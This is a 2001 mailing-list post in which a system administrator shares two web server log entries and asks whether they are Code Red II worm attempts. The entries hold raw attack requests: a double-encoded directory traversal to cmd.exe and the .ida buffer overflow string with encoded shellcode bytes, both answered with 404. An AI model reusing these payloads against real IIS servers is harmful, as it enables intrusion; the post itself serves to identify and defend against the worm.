[ale] Code Red 2

Michael Smith MSmith at webtonetech.com
Tue Aug 7 16:46:07 EDT 2001


Here is what I think is an attempt by the second variant of the code
red......

Am I right?

24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET
/scripts/..%255c..%255cwinnt/
system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-"
"-"
209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET
/default.ida?XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%
u909
0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8
b00%
u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 285 "-" "-"
20


Michael Smith
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.





More information about the Ale mailing list